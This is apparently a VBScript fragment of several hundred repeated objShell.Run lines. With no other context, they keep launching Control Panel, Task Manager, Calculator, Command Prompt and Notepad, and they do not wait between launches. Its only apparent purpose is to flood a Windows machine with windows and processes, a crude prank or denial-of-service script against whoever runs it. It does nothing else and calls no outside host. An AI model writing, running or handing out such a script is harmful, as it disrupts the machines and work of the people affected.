objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

